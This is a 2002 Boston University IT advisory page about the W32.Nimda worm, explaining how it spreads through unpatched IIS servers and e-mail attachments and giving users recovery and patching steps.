The W32.Nimda Worm
(updated 1/29/2002)

What is the W32.Nimda Worm?

The W32.Nimda virus is an Internet, fileshare, and mass mailing worm. It spreads by exploiting unpatched Microsoft IIS Web servers and through mass-mailed e-mail attachments named "readme.exe". If successful, it appears to deface the Web pages on the IIS Web site and install a backdoor. Initial reports indicate that the worm might also spread via network shares. This page will be updated as more information becomes available.

Where can I find more information about this virus?

Below are some links to information posted by others. While we believe this information may be useful and reasonably accurate, we have neither authenticated nor verified any of it.

See Symantec's Web site, NAI's Web site, and F-Secure's Web site for current information on the status of this worm and to find out when virus definition updates will become available. Updates that detect and protect against the Nimda worm are now available for Symantec's Norton Antivirus, NAI's McAfee, and Datafellows' F-Secure. See the CERT Advisory for a technical analysis of the worm.

My dial-up access or network port was disabled. What should I do?

If our log files indicate that your system has been infected and is attempting to infect other systems, your network port has probably been disabled to lessen the number of other systems that will be infected. As described above, the virus has probably entered through an unpatched version of Microsoft's Web Server (IIS) running on your system, or you became infected by visiting an infected server, or through an infected network share or possibly through an infected e-mail attachment (probably named readme.exe). It is likely that a back door has been installed on your system. Among other things, this backdoor opens to the world complete administrator-level access to your C: drive and leaves behind numerous files to ease reinfection. At this time, the only sure way to recover from this infection is to reformat your disk(s), reinstall all files, and patch your computer.. In the next few days, tools may become available that will make the cleanup process easier.

When your system has been reformatted, reinstalled and patched, contact the BU OIT Security Team to arrange to have network access re-enabled. Host inspection may be required before your network access is restored.

How can I remove this virus?

Follow the instructions below to remove this virus. If you have any doubts about your ability to remove the virus from your computer, please seek help from your local computing support staff or contact the PCSC (617/353-7272, pcsc@bu.edu). If you are affiliated with Boston University's School of Management, please contact:

Computer Support Services (Room 630)
Boston University School Of Management
617/353-9440

If you are affiliated with Boston University, you can download and install the latest version of Network Associates' McAfee VirusScan for free, as Boston University has a site license for this product. Please visit BU's Anti-Virus software Web site for more information. This site will prompt you for your BU login name and Kerberos password before allowing access.

Specific instructions for removing the W32.Nimda Worm

Currently, there is no known reliable tool to remove this virus. Since this virus attacks many different vulnerabilities at once, we suspect it will take developers a few days to create such a tool, if it can be created at all. In the mean time, the only way to disinfect your computer is to reformat your disk(s), reinstall all files, and patch your computer. CERT currently recommends this as the only effective solution. NOTE: If you MUST run IIS, you must take additional steps to patch the system before reconnecting it to the network. If these steps are not taken, your system will almost certainly become reinfected within a minute or two from the time you reconnect to the network.

Update: If you absolutely can not reinstall all files, you may try the steps outlined below. Should your computer become reinfected, you will have no other choice but to completely rebuild your computer.

Is there anything else I can do to protect myself from this type of attack?

If you do not need to run IIS on your computer, you should turn it off immediately. Guides for doing so are available from Microsoft at:

Microsoft Internet Information Server (IIS)4 for Windows NT
Microsoft Internet Information Server (IIS)5 for Windows 2000

If you decide to continue running IIS on your computer, you should apply all current patches and remain alert for future advisories on IIS and apply those patches as well. Microsoft has a detailed article explaining the steps necessary to prevent your Web site from defacements and such at: www.microsoft.com/technet/columns/insider/default.asp

Steps for securely reinstalling systems that MUST run IIS

this section now avaialble at:
http://www.bu.edu/security/windows/safeinstall.html

Alternatively, you may want to check into BU's Web Services at www.bu.edu/webcentral/publishing where you will find information about publishing your pages on BU's centrally maintained Web server, freeing you from the need to maintain your own Web server.

I can't possibly reformat my drive(s), reinstall all of my software and patch my system because I don't have my software on CDs or I don't have any backups, or I don't know how, and don't have anyone to help me.

As we've discussed, the only known good solution to Nimda is a complete reformat, reinstall, and patch. However, we understand that this may not be possible for some of you. If this is the case, please follow our "reasonably good" alternative steps outlined below.

1. Permanently disable IIS by downloading and running Microsoft's Code Red Cleaner Tool with the -disable option.

2. Get the Nimda Cleaner from the Anti-Virus vendor of your choice and follow the instructions that come with it. Note that these cleaners must be run TWICE, as indicated in the instructions. Instructions must be followed to the letter for the tool to succeed.

Symantec's Removal Tool
Network Associates/McAfee's tool Note: Be sure to read the text instructions next to the link for downloading the tool.

3. Apply the appropriate Microsoft patch for your computer.

4. Get, install, update, and run the virus scanner of your choice.

 

Return to main virus information page